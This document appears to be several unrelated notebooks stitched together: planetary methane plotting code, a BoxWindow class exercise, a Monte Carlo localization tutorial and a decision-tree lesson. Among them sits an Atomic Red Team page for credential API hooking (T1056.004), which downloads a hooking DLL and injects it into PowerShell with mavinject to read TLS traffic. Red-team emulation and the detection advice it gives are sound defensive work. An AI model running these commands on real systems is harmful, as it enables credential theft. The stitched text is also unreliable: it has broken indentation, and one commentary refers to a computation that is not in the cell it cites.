ax1.text(0.02, 0.05, 'Earth-like world', transform=ax1.transAxes,color='w')
xxx = np.linspace(-40,10)
ax.plot(xxx,xxx*0,'w:')
ax.plot(xxx*0,xxx,'w:')
ax1.plot(xxx,xxx*0,'w:')
ax1.plot(xxx*0,xxx,'w:')
num_nan = np.sum(np.isnan(resultso[:,1]))
print('fraction of Ocean world calculations where CH4/CO>1 = ',\
len(np.where(resultso[:,1][~np.isnan(resultso[:,1])]>1)[0])/(n-num_nan))
num_nan = np.sum(np.isnan(resultsb[:,1]))
print('fraction of Earth-like world calculations where CH4/CO>1 = ',\
len(np.where(resultsb[:,1][~np.isnan(resultsb[:,1])]>1)[0])/(n-num_nan))
# ax.set_xlim(-27,5)
# ax.set_ylim(-1,5)
# plt.savefig("both.pdf",bbox_inches='tight')
plt.show()
plt.rcParams.update({'font.size': 18})
mod_earth = 30*3000*1e9
fig,[[ax2,ax3],[ax4,ax5]] = plt.subplots(2,2,figsize=[14,10])#,gridspec_kw={'height_ratios':[3,2]})
#ax.set_xticks(np.arange(0,22,5))
plt.subplots_adjust(wspace=.3,hspace=.35)
# ax.text(-0.15, 1.10, '(a)', transform=ax.transAxes,size=25)
# ax1.text(-0.15, 1.10, '(b)', transform=ax1.transAxes,size=25)
ax2.text(-0.15, 1.10, '(a)', transform=ax2.transAxes,size=25)
ax3.text(-0.15, 1.10, '(b)', transform=ax3.transAxes,size=25)
ax4.text(-0.15, 1.10, '(c)', transform=ax4.transAxes,size=25)
ax5.text(-0.15, 1.10, '(d)', transform=ax5.transAxes,size=25)
# ax.text(0.02, 0.05, 'Ocean world', transform=ax.transAxes,color='w')
# ax1.text(0.02, 0.05, 'Earth-like world', transform=ax1.transAxes,color='w')
ax2.text(0.02, 0.89, 'Ocean world', transform=ax2.transAxes,color='k')
ax3.text(0.02, 0.89, 'Earth-like world', transform=ax3.transAxes,color='k')
ax4.text(0.02, 0.89, 'Ocean world', transform=ax4.transAxes,color='k')
ax5.text(0.02, 0.89, 'Earth-like world', transform=ax5.transAxes,color='k')
#plt.savefig("both.pdf",bbox_inches='tight')
# now other things
bins = np.arange(-32,2,1.5)
ax2.set_xticks(np.arange(-32,1,6))
ax3.set_xticks(np.arange(-32,1,6))
ax2.hist(np.log10(resultso[:,3]),bins = bins,density=True)
ax2.set_ylabel('Normalized count')
ax2.set_xlabel('log(mol $\mathrm{CH_4}$/kg magma)')
ax3.hist(np.log10(resultsb[:,3]),bins = bins,density=True)
ax3.set_ylabel('Normalized count')
ax3.set_xlabel('log(mol $\mathrm{CH_4}$/kg magma)')
ax2.set_xlim(ax2.get_xlim()[0],ax2.get_xlim()[1])
ax3.set_xlim(ax2.get_xlim()[0],ax2.get_xlim()[1])
ax2.set_ylim(ax3.get_ylim()[0],ax3.get_ylim()[1])
ax3.set_ylim(ax3.get_ylim()[0],ax3.get_ylim()[1])
ax2.set_yticks([0.,0.02,0.04,0.06])
ax3.set_yticks([0.,0.02,0.04,0.06])
# now gas fluxes
bins1 = np.arange(-31,8,1.5)
ax4.set_xticks(np.arange(-30,2,6))
ax5.set_xticks(np.arange(-30,2,6))
ax4.hist(np.log10(resultso[:,3]*mod_earth/1e12),bins = bins1,density=True)
ax4.set_ylabel('Normalized count')
ax4.set_xlabel('Methane flux (log(Tmol/yr))')
ax5.hist(np.log10(resultsb[:,3]*mod_earth/1e12),bins = bins1,density=True)
ax5.set_ylabel('Normalized count')
ax5.set_xlabel('Methane flux (log(Tmol/yr))')
ax4.set_xlim(ax4.get_xlim()[0],3.5)
ax4.set_xlim(ax4.get_xlim()[0],ax4.get_xlim()[1])
ax5.set_xlim(ax4.get_xlim()[0],ax4.get_xlim()[1])
ax4.set_ylim(ax5.get_ylim()[0],ax5.get_ylim()[1])
ax5.set_ylim(ax5.get_ylim()[0],ax5.get_ylim()[1])
ax4.set_yticks([0.,0.02,0.04,0.06])
ax5.set_yticks([0.,0.02,0.04,0.06])
Ebio = 30
lims = ax4.get_xlim()
val = ((lims[1]-lims[0])-(lims[1]-np.log10(Ebio)))/(lims[1]-lims[0])
ax4.text(val,.71,'Mod.\nEarth\nbio.\nflux',ha='center',va='bottom', transform=ax4.transAxes,fontsize = 12)
ax4.arrow(val, .7, 0, -0.69, transform=ax4.transAxes, length_includes_head=True\
,head_width = .03,fc='k')
lims = ax5.get_xlim()
val = ((lims[1]-lims[0])-(lims[1]-np.log10(Ebio)))/(lims[1]-lims[0])
ax5.text(val,.61,'Mod.\nEarth\nbio.\nflux',ha='center',va='bottom', transform=ax5.transAxes,fontsize = 12)
ax5.arrow(val, .6, 0, -0.59, transform=ax5.transAxes, length_includes_head=True\
,head_width = .03,fc='k')
volc_flux = 1
print('Fraction ocean world calculations where CH4 > 10 Tmol assuming\n'+str(volc_flux)+\
      " times Earth's magma production rate =",1-(np.sum(resultso[:,3]*volc_flux*mod_earth/1e12 < 10))/n)
print()
print('Fraction Earth-like world calculations where CH4 > 10 Tmol assuming\n'+str(volc_flux)+\
      " times Earth's magma production rate =",1-(np.sum(resultsb[:,3]*volc_flux*mod_earth/1e12 < 10))/n)
# plt.savefig("CH4_prod.pdf",bbox_inches='tight')
plt.show()
```
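The FMQ-buffer oxygen fugacity computed twice in the cell above can be factored into a small helper (a sketch restating the formula and constants from the code; `f_O2_fmq` is a hypothetical name):

```python
def f_O2_fmq(T, P, delta_fmq=0.0):
    """Oxygen fugacity at an offset delta_fmq (log10 units) from the FMQ buffer.

    T in kelvin, P in bar; A, B, C are the constants used in the cell above.
    """
    A, B, C = 25738, 9, 0.092
    log_fmq = -A / T + B + C * (P - 1) / T
    return 10 ** (log_fmq + delta_fmq)

print('%.3e' % f_O2_fmq(1473, 1000))  # T = 1473 K, P = 1000 bar, on the buffer
```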
# T1056.004 - Input Capture: Credential API Hooking
Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Endgame Process Injection July 2017)
* **Import address table (IAT) hooking**, which uses modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Endgame Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Endgame Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
## Atomic Tests
```
# Import the module before running the tests.
# Check out the Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 -Force
```
### Atomic Test #1 - Hook PowerShell TLS Encrypt/Decrypt Messages
Hooks functions in PowerShell to read TLS Communications
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Dependencies: Run with `powershell`!
##### Description: T1056.004x64.dll must exist on disk at specified location (#{file_name})
##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1056.004\bin\T1056.004x64.dll) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path PathToAtomicsFolder\T1056.004\bin\T1056.004x64.dll) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "PathToAtomicsFolder\T1056.004\bin\T1056.004x64.dll"
```
```
Invoke-AtomicTest T1056.004 -TestNumbers 1 -GetPreReqs
```
#### Attack Commands: Run with `powershell`
```powershell
mavinject $pid /INJECTRUNNING PathToAtomicsFolder\T1056.004\bin\T1056.004x64.dll
curl https://www.example.com
```
```
Invoke-AtomicTest T1056.004 -TestNumbers 1
```
## Detection
Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkit detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
```
#from lab2.utils import get_random_number_generator
class BoxWindow:
"""[summary]"""
def __init__(self, args):
        """Initialize the box window from its bounding points.
        Args:
            args (np.ndarray): array of shape (d, 2) giving the [min, max] bounds along each dimension
        """
self.bounds = args
def __str__(self):
r"""BoxWindow: :math:`[a_1, b_1] \times [a_2, b_2] \times \cdots`
Returns:
str : give the bounds of the box
"""
        mot = ""
        for k in range(len(self.bounds)):
            mot = mot + '[' + str(self.bounds[k][0]) + ', ' + str(self.bounds[k][1]) + ']'
            if k != len(self.bounds) - 1:
                mot = mot + ' x '
        return ("BoxWindow: " + mot)
    def __len__(self):
        """Return the list of side lengths of the box.
        Note: since this returns a list rather than an int, call it as ``box.__len__()``.
        """
        L = []
        for k in range(len(self.bounds)):
            L.append(self.bounds[k][1] - self.bounds[k][0])
        return L
    def __contains__(self, args):
        """args: coordinates of a point"""
        for p in range(len(args)):
            if self.bounds[p][0] <= args[p] <= self.bounds[p][1]:
                continue
            else:
                return False
        return True
# a=self.bounds[:,0]
# b=self.bounds[:,1]
# return all(np.logical_and(a<= point, point<=b))
    def dimension(self):
        """Return the number of dimensions of the box."""
        return (len(self.bounds))
    def volume(self):
        """Return the volume of the box (product of its side lengths)."""
        vol = 1
        for p in self.__len__():
            vol = vol * p
        return vol
    def indicator_function(self, args):
        """Return 1 if the point ``args`` lies in the box, 0 otherwise.
        Args:
            args: coordinates of a point
        """
        return 1 if args in self else 0
    def rand(self, n=1, rng=None):
        """Generate ``n`` points uniformly at random inside the :py:class:`BoxWindow`.
        Args:
            n (int, optional): number of points. Defaults to 1.
            rng (optional): seed or np.random.Generator. Defaults to None.
        """
        rng = get_random_number_generator(rng)
        L = []
        for p in range(n):
            L_petit = []
            for k in range(len(self.bounds)):
                if self.bounds[k][0] == self.bounds[k][1]:
                    L_petit.append(self.bounds[k][0])
                else:
                    # draw uniformly in [low, high] with the provided generator
                    L_petit.append(rng.uniform(self.bounds[k][0], self.bounds[k][1]))
            L.append(L_petit)
        return (L)
# inheritance
class UnitBoxWindow(BoxWindow):
    def __init__(self, center, dimension):
        """Box of unit side length in the given dimension, centered at ``center``.
        Args:
            center (array-like): coordinates of the box center, of length ``dimension``
            dimension (int): number of dimensions
        """
        bounds = np.array([[c - 0.5, c + 0.5] for c in center])
        super().__init__(bounds)
import numpy as np
def get_random_number_generator(seed):
"""Turn seed into a np.random.Generator instance."""
return np.random.default_rng(seed)
np.random.uniform(0)
import numpy as np
c=BoxWindow(np.array([[2.5, 2.5]]))
d=BoxWindow(np.array([[0, 5], [-1.45, 3.14], [-10, 10]]))
d.bounds.shape
d.bounds[0][1]
c.rand()
point1=[-1,1,1]
point2=[1,1,1]
d.__contains__(point1)
d.indicator_function(point1)
d.__len__()
d.volume()
d.__str__()
c.__str__()
```
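The commented-out lines in `__contains__` hint at a vectorized version. A sketch of that idea (`box_contains` is a hypothetical standalone helper, assuming `bounds` is a `(d, 2)` array with the same closed-box semantics):

```python
import numpy as np

def box_contains(bounds, point):
    """True if point lies inside the closed box described by bounds, a (d, 2) array."""
    a, b = bounds[:, 0], bounds[:, 1]
    point = np.asarray(point)
    return bool(np.all((a <= point) & (point <= b)))

bounds = np.array([[0, 5], [-1.45, 3.14], [-10, 10]])
print(box_contains(bounds, [-1, 1, 1]))  # False: x = -1 is below the lower bound 0
print(box_contains(bounds, [1, 1, 1]))   # True
```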
# Monte Carlo localization
A sample implementation of Monte Carlo localization.
## Importing libraries
```
%matplotlib inline
import math, random                 # math utilities and random-number generation
import matplotlib.pyplot as plt     # plotting library
```
## Landmark class
These are the stars shown in the plot below.
The robot uses them as reference points to figure out its own position.
In this example the robot is assumed to already know where the stars are.
See the observation-model code below for how the robot perceives the stars.
```
class Landmarks:
    def __init__(self, array):
        self.positions = array  # array = [[star1 x, star1 y], [star2 x, star2 y], ...]
    def draw(self):
        # extract the landmark positions and plot them
        xs = [e[0] for e in self.positions]
        ys = [e[1] for e in self.positions]
        plt.scatter(xs,ys,s=300,marker="*",label="landmarks",color="orange")
```
## Motion model
The robot moves forward by fw and then rotates by rot.
A real robot does not drive exactly as commanded and may slip, so this is imitated with random.gauss.
With a real robot, you would drive it around beforehand to measure how accurate and biased its motion is.
```
def Movement(pos, fw, rot):
    # Motion model
    # Returns, as a list, the pose reached from pos after moving forward fw and rotating rot
    # Noisy forward and rotational motion
    actual_fw = random.gauss(fw, fw/10)                   # standard deviation of 10%
    actual_rot = random.gauss(rot, rot/10)                # standard deviation of 10%
    dir_error = random.gauss(0.0, math.pi / 180.0 * 3.0)  # standard deviation of 3 [deg]
    # save the pose before the move
    px, py, pt = pos
    # compute the pose after the move
    x = px + actual_fw * math.cos(pt + dir_error)
    y = py + actual_fw * math.sin(pt + dir_error)
    t = pt + dir_error + actual_rot                       # add dir_error
    # return the result
    return [x,y,t]
```
## Observation model
The robot looks at the stars defined in the landmark class one by one.
It can read off the distance and direction of each star as seen from itself.
As with the motion model, the readings are not exact, so noise is again simulated with random.gauss.
In this example the robot's field of view is 180 degrees and it can see out to a distance of 1.
```
def Observation(pos, landmark):
    # Observation model
    # Returns, as a list, the distance and direction of each landmark visible from pos
    obss = []
    # Sensor range:
    #   distance 0.1 to 1
    #   angle -90 to 90 [deg]
    sensor_max_range = 1.0
    sensor_min_range = 0.1
    sensor_max_angle = math.pi / 2
    sensor_min_angle = -math.pi / 2
    # pose of the robot or particle
    rx, ry, rt = pos
    # observe each landmark
    for lpos in landmark.positions:
        true_lx, true_ly = lpos
        # result is True if the observation succeeds
        result = True
        # distance between the robot and the landmark;
        # result becomes False if it is outside the sensor range
        distance = math.sqrt((rx - true_lx) ** 2 + (ry - true_ly) ** 2)
        if distance > sensor_max_range or distance < sensor_min_range:
            result = False
        # direction of the landmark as seen from the robot;
        # result also becomes False if it is outside the sensor range
        direction = math.atan2(true_ly - ry, true_lx - rx) - rt
        if direction > math.pi: direction -= 2 * math.pi
        if direction < - math.pi: direction += 2 * math.pi
        if direction > sensor_max_angle or direction < sensor_min_angle:
            result = False
        # noise magnitudes; these are the standard deviations of the
        # Gaussians used later in the likelihood calculation
        sigma_d = distance * 0.1        # 10% standard deviation
        sigma_f = math.pi * 3 / 180     # 3 deg standard deviation
        # mix in the noise
        d = random.gauss(distance, sigma_d)
        f = random.gauss(direction, sigma_f)
        # store the observation (append, so every landmark is kept)
        obss.append([d, f, sigma_d, sigma_f, result])
    return obss
```
## Particle class
These are the many blue arrows drawn in the plots below.
Like the robot, the particles move while using the stars as reference points, but each one also carries a weight w.
The more a particle's observation resembles the robot's, the larger its weight, and the more likely it is to survive resampling.
So if the observations go well, only particles near the robot's true position remain.
```
class Particle:
    def __init__(self, x, y, t, w):
        # a particle carries a pose and a weight
        self.pos = [x, y, t]
        self.w = w
class Particles:
    # num is the number of particles
    def __init__(self, x, y, t, num):
        self.particles = []
        for i in range(num):
            # start with equal weights for everyone
            self.particles.append(Particle(x, y, t, 1.0 / num))
    def move(self, fw, rot):
        # move the particles
        for i in self.particles:
            i.pos = Movement(i.pos, fw, rot)
    def observation(self, landmarks):
        # store each particle's observation data z
        for i in self.particles:
            i.z = Observation(i.pos, landmarks)
    def likelihood(self, robot):
        for particle in self.particles:
            for i in range(len(particle.z)):
                # compare each particle's observation with the robot's
                rd, rf, sigma_rd, sigma_rf, result_r = robot.z[i]
                pd, pf, sigma_pd, sigma_pf, result_p = particle.z[i]
                # only computed when result is True for both the robot and the particle
                if result_r and result_p:
                    # the likelihood is a product of Gaussians:
                    # particles whose observations are close to the robot's score high
                    likelihood_d = math.exp(-(rd - pd) ** 2 / (2 * (sigma_rd ** 2))) / (sigma_rd * math.sqrt(2 * math.pi))
                    likelihood_f = math.exp(-(rf - pf) ** 2 / (2 * (sigma_rf ** 2))) / (sigma_rf * math.sqrt(2 * math.pi))
                    # accumulate the likelihood into the particle's weight
                    particle.w *= likelihood_d * likelihood_f
    def resampling(self):
        num = len(self.particles)
        # build the list of weights
        ws = [e.w for e in self.particles]
        # particles with larger weights are selected with higher probability
        ps = random.choices(self.particles, weights = ws, k = num)
        # inherit the selected particles' poses and rebuild a set with equal weights
        self.particles = [Particle(*e.pos, 1.0 / num) for e in ps]
    # compute the positions and directions needed for the arrows, then draw them
    def draw(self, c = "blue", lbl = "particles"):
        xs = [p.pos[0] for p in self.particles]
        ys = [p.pos[1] for p in self.particles]
        vxs = [math.cos(p.pos[2]) for p in self.particles]
        vys = [math.sin(p.pos[2]) for p in self.particles]
        plt.quiver(xs, ys, vxs, vys, color = c, label = lbl, alpha = 0.7)
```
## Robot class
Its basic structure is the same as a particle's.
For clarity, the poses are stored in an array so the trajectory can be displayed.
You can see the trajectory in the plots below.
```
class Robot:
    def __init__(self, x, y, rad):
        # array holding the true pose of the robot at each step
        self.actual_poses = [[x,y,rad]]
    def move(self,fw,rot):
        # record the robot's pose (kept in an array so the trajectory can be drawn)
        self.actual_poses.append(Movement(self.actual_poses[-1], fw, rot))
    def observation(self, landmarks):
        # store the observation data as seen from the current pose
        self.z = Observation(self.actual_poses[-1], landmarks)
    # compute the positions and directions needed for the arrows, then draw them
    def draw(self, sp):
        xs = [e[0] for e in self.actual_poses]
        ys = [e[1] for e in self.actual_poses]
        vxs = [math.cos(e[2]) for e in self.actual_poses]
        vys = [math.sin(e[2]) for e in self.actual_poses]
        plt.quiver(xs,ys,vxs,vys,color="red",label="actual robot motion")
```
## Drawing function
Sets up the figure size and so on, then calls each object's draw method in turn.
```
def draw(i):
    # figure settings
    fig = plt.figure(i, figsize=(8,8))
    sp = fig.add_subplot(111,aspect='equal')
    sp.set_xlim(-1.0,1.0)
    sp.set_ylim(-0.5,1.5)
    # draw the particles, the robot, and the landmarks
    particles.draw()
    robot.draw(sp)
    actual_landmarks.draw()
    plt.legend()
```
## Starting the simulation
Place the robot, the particles, and the landmarks, then start the simulation.
```
# place and initialize the robot, particles, and landmarks
robot = Robot(0, 0, 0)
particles = Particles(0, 0, 0, 30)
actual_landmarks = Landmarks([[-0.5,0.0],[0.5,0.0],[0.0,0.5]])
draw(0)
for i in range(1,18):
    # move the robot and the particles
    robot.move(0.2,math.pi / 180.0 * 20)
    particles.move(0.2,math.pi / 180.0 * 20)
    # robot and particle observations
    robot.observation(actual_landmarks)
    particles.observation(actual_landmarks)
    # likelihood computation
    particles.likelihood(robot)
    # resampling
    particles.resampling()
    # drawing
    draw(i)
```
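After resampling, a single pose estimate is often taken from the particle cloud; the sample above stops at drawing, but a minimal sketch (not part of the original) averages x and y and recovers the mean heading via `atan2` of averaged sines and cosines so angles wrap correctly:

```python
import math

class Pose:  # minimal stand-in for the Particle class above
    def __init__(self, x, y, t):
        self.pos = [x, y, t]

def estimate_pose(particles):
    """Average x and y; average the heading via atan2 of mean sin/cos."""
    n = len(particles)
    x = sum(p.pos[0] for p in particles) / n
    y = sum(p.pos[1] for p in particles) / n
    s = sum(math.sin(p.pos[2]) for p in particles) / n
    c = sum(math.cos(p.pos[2]) for p in particles) / n
    return [x, y, math.atan2(s, c)]

cloud = [Pose(0.0, 0.0, 0.1), Pose(0.2, 0.2, -0.1)]
print(estimate_pose(cloud))  # x = 0.1, y = 0.1, heading near 0.0
```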
# Introduction to Data Science
## From correlation to supervised segmentation and tree-structured models
Spring 2018 - Profs. Foster Provost and Josh Attenberg
Teaching Assistant: Apostolos Filippas
***
### Some general imports
```
import os
import numpy as np
import pandas as pd
import math
import matplotlib.pylab as plt
import seaborn as sns
%matplotlib inline
sns.set(style='ticks', palette='Set2')
```
Recall the automobile MPG dataset from last week? Because it's familiar, let's reuse it here.
```
url = "http://archive.ics.uci.edu/ml/machine-learning-databases/auto-mpg/auto-mpg.data-original"
column_names = ['mpg', 'cylinders', 'displacement', 'horsepower', 'weight', 'acceleration',
'model', 'origin', 'car_name']
mpg_df = pd.read_csv(url,
delim_whitespace=True,
header=None,
names=column_names).dropna()
```
Rather than attempt to predict the MPG from the other aspects of a car, let's try a simple classification problem: whether a car gets good mileage (high MPG) or not.
```
mpg_df["mpg"].hist()
```
Arbitrarily, let's say that those cars with an MPG greater than the median get good miles per gallon.
```
median_mpg = mpg_df["mpg"].median()
print ("the median MPG is: %s" % median_mpg)
def is_high_mpg(mpg):
return 1 if mpg > median_mpg else 0
mpg_df["is_high_mpg"] = mpg_df["mpg"].apply(is_high_mpg)
```
We'd like to use information contained in the other automobile quantities to predict whether or not the car is efficient. Let's take a look at how well these observables "split" our data according to our target.
```
def visualize_split(df, target_column, info_column, color_one="red", color_two="blue"):
plt.rcParams['figure.figsize'] = [15.0, 2.0]
    color = [color_one if x == 0 else color_two for x in df[target_column]]
plt.scatter(df[info_column], df[target_column], c=color, s=50)
plt.xlabel(info_column)
plt.ylabel(target_column)
plt.show()
visualize_split(mpg_df, "is_high_mpg", "weight")
```
Above we see a scatter plot of all possible car weights and a color code that represents our target variable (is good mpg).
- Blue dots correspond to fuel efficient cars, red dots are fuel inefficient cars
- The horizontal position is the weight of the car
- The vertical position separates our two classes
Clearly, car weight and high MPG are inversely related: cars weighing more than about 3000 lbs tend to be inefficient. How effective is this decision boundary? Let's quantify it!
***
**Entropy** ($H$) and **information gain** ($IG$) are useful tools for measuring the effectiveness of a split on the data. Entropy measures how random data is; information gain measures the reduction in randomness achieved by performing a split.
<table style="border: 0px">
<tr style="border: 0px">
<td style="border: 0px"><img src="images/dsfb_0304.png" height=80% width=80%>
Figure 3-4. Splitting the "write-off" sample into two segments, based on splitting the Balance attribute (account balance) at 50K.</td>
<td style="border: 0px; width: 30px"></td>
<td style="border: 0px"><img src="images/dsfb_0305.png" height=75% width=75%>
Figure 3-5. A classification tree split on the three-valued Residence attribute.</td>
</tr>
</table>
Given the data, it is fairly straightforward to calculate both of these quantities.
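For intuition before the DataFrame-based version below, here is a tiny standalone worked example (plain standard-library Python, independent of our data): a 50/50 class split has the maximum entropy of 1 bit, while a 90/10 split is far more predictable.

```
import math

def entropy_from_probs(probs):
    """Shannon entropy in bits: sum_i -p_i * log2(p_i), skipping zero probabilities."""
    return sum(-p * math.log2(p) for p in probs if p > 0)

print(entropy_from_probs([0.5, 0.5]))  # -> 1.0 (a fair coin is maximally random)
print(entropy_from_probs([0.9, 0.1]))  # -> ~0.469 (mostly predictable)
print(entropy_from_probs([1.0]))       # -> 0.0 (no uncertainty at all)
```

The functions defined next compute the same quantity, but starting from a pandas column of labels rather than a list of probabilities.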
##### Functions to get the entropy and IG
```
def entropy(target_column):
"""
computes -sum_i p_i * log_2 (p_i) for each i
"""
# get the counts of each target value
target_counts = target_column.value_counts().astype(float).values
total = target_column.count()
# compute probas
probas = target_counts/total
# p_i * log_2 (p_i)
entropy_components = probas * np.log2(probas)
# return negative sum
return - entropy_components.sum()
def information_gain(df, info_column, target_column, threshold):
"""
computes H(target) minus the count-weighted entropies of the two partitions (info > thresh and info <= thresh)
"""
data_above_thresh = df[df[info_column] > threshold]
data_below_thresh = df[df[info_column] <= threshold]
H = entropy(df[target_column])
entropy_above = entropy(data_above_thresh[target_column])
entropy_below = entropy(data_below_thresh[target_column])
ct_above = data_above_thresh.shape[0]
ct_below = data_below_thresh.shape[0]
tot = float(df.shape[0])
return H - entropy_above*ct_above/tot - entropy_below*ct_below/tot
```
Now that we have a way of calculating $H$ and $IG$, let's use $IG$ to test our earlier hunch that splitting on weight at 3000 helps determine whether a car is high MPG.
```
threshold = 3000
prior_entropy = entropy(mpg_df["is_high_mpg"])
IG = information_gain(mpg_df, "weight", "is_high_mpg", threshold)
print ("IG of %.4f using a threshold of %.2f given a prior entropy of %.4f" % (IG, threshold, prior_entropy))
```
How good was our guess of 3000? Let's loop through all possible splits on weight and see what is the best!
```
def best_threshold(df, info_column, target_column, criteria=information_gain):
maximum_ig = 0
maximum_threshold = 0
for thresh in df[info_column]:
IG = criteria(df, info_column, target_column, thresh)
if IG > maximum_ig:
maximum_ig = IG
maximum_threshold = thresh
return (maximum_threshold, maximum_ig)
maximum_threshold, maximum_ig = best_threshold(mpg_df, "weight", "is_high_mpg")
print ("the maximum IG we can achieve splitting on weight is %.4f using a thresh of %.2f" % (maximum_ig, maximum_threshold))
```
Other observed features may also give us a strong clue about the efficiency of cars.
```
predictor_cols = ['cylinders', 'displacement', 'horsepower', 'weight', 'acceleration', 'model', 'origin']
for col in predictor_cols:
visualize_split(mpg_df, "is_high_mpg", col)
```
This raises the question: which feature gives the most effective split?
```
def best_split(df, info_columns, target_column, criteria=information_gain):
maximum_ig = 0
maximum_threshold = 0
maximum_column = ""
for info_column in info_columns:
thresh, ig = best_threshold(df, info_column, target_column, criteria)
if ig > maximum_ig:
maximum_ig = ig
maximum_threshold = thresh
maximum_column = info_column
return maximum_column, maximum_threshold, maximum_ig
maximum_column, maximum_threshold, maximum_ig = best_split(mpg_df, predictor_cols, "is_high_mpg")
print ("The best column to split on is %s giving us an IG of %.4f using a thresh of %.2f" % (maximum_column, maximum_ig, maximum_threshold))
```
### The Classifier Tree: Recursive Splitting
Of course, splitting the data once sometimes isn't enough to make accurate categorical predictions. However, we can continue to split the data recursively until we achieve acceptable results. This recursive splitting is the basis of the "decision tree classifier" or "classifier tree", a popular and powerful class of machine learning algorithms. This particular entropy-based algorithm is known as ID3 (Iterative Dichotomiser 3).
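To make the recursion concrete, here is a minimal single-feature sketch in plain Python (illustrative names, not sklearn's or ID3's actual implementation): pick the threshold with the highest information gain, partition the data, and recurse until a node is pure or a depth limit is reached.

```
import math
from collections import Counter

def entropy(labels):
    """Shannon entropy (bits) of a list of class labels."""
    n = len(labels)
    return -sum((c / n) * math.log2(c / n) for c in Counter(labels).values())

def best_split(values, labels):
    """Return (threshold, information_gain) for the best split value > threshold."""
    base, best = entropy(labels), (None, 0.0)
    n = len(labels)
    for t in sorted(set(values)):
        left = [y for x, y in zip(values, labels) if x <= t]
        right = [y for x, y in zip(values, labels) if x > t]
        if not left or not right:
            continue
        ig = base - entropy(left) * len(left) / n - entropy(right) * len(right) / n
        if ig > best[1]:
            best = (t, ig)
    return best

def build_tree(values, labels, depth=0, max_depth=3):
    """Recursively split on one numeric feature; leaves predict the majority class."""
    if depth == max_depth or len(set(labels)) == 1:
        return Counter(labels).most_common(1)[0][0]   # leaf: majority vote
    t, ig = best_split(values, labels)
    if t is None or ig == 0.0:
        return Counter(labels).most_common(1)[0][0]
    left = [(x, y) for x, y in zip(values, labels) if x <= t]
    right = [(x, y) for x, y in zip(values, labels) if x > t]
    return {"thresh": t,
            "left": build_tree(*zip(*left), depth + 1, max_depth),
            "right": build_tree(*zip(*right), depth + 1, max_depth)}

# Toy version of our weight/efficiency data
weights = [2000, 2200, 2400, 3200, 3600, 4000]
is_high = [1, 1, 1, 0, 0, 0]
print(build_tree(weights, is_high))  # -> {'thresh': 2400, 'left': 1, 'right': 0}
```

With one clean threshold the tree stops after a single split; on real data the recursion keeps going down the impure branches.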
What are some other ways you might consider splitting the data?
```
def Plot_Data(df, info_col_1, info_col_2, target_column, color1="red", color2="blue"):
# Make the plot square
plt.rcParams['figure.figsize'] = [12.0, 8.0]
# Color
color = [color1 if x == 0 else color2 for x in df[target_column]]
# Plot and label
plt.scatter(df[info_col_1], df[info_col_2], c=color, s=50)
plt.xlabel(info_col_1)
plt.ylabel(info_col_2)
plt.xlim([min(df[info_col_1]) , max(df[info_col_1]) ])
plt.ylim([min(df[info_col_2]) , max(df[info_col_2]) ])
plt.show()
plt.figure(figsize=[7,5])
Plot_Data(mpg_df, "acceleration", "weight","is_high_mpg")
```
Rather than build a classifier tree from scratch (consider whether you could now do this!), let's use sklearn's implementation, which includes some additional functionality.
```
from sklearn.tree import DecisionTreeClassifier
# Let's define the model (tree)
decision_tree = DecisionTreeClassifier(max_depth=1, criterion="entropy") # Look at those 2 arguments !!!
# Let's tell the model what is the data
decision_tree.fit(mpg_df[predictor_cols], mpg_df["is_high_mpg"])
```
We now have a classifier tree, let's visualize the results!
```
import os
from IPython.display import Image
from sklearn.tree import export_graphviz
def visualize_tree(decision_tree, feature_names, class_names, directory="./images", name="tree",proportion=True):
# Export our decision tree to graphviz format
dot_name = "%s/%s.dot" % (directory, name)
dot_file = export_graphviz(decision_tree, out_file=dot_name,
feature_names=feature_names, class_names=class_names,proportion=proportion)
# Call graphviz to make an image file from our decision tree
image_name = "%s/%s.png" % (directory, name)
os.system("dot -Tpng %s -o %s" % (dot_name, image_name))
# to get this part to actually work, you may need to open a terminal window in Jupyter and run the following command "sudo apt install graphviz"
# Return the .png image so we can see it
return Image(filename=image_name)
visualize_tree(decision_tree, predictor_cols, ["n", "y"])
```
Let's look at the `"acceleration"` and `"weight"` features, including the **DECISION SURFACE!!**
More details for this graph: [sklearn decision surface](http://scikit-learn.org/stable/auto_examples/tree/plot_iris.html)
```
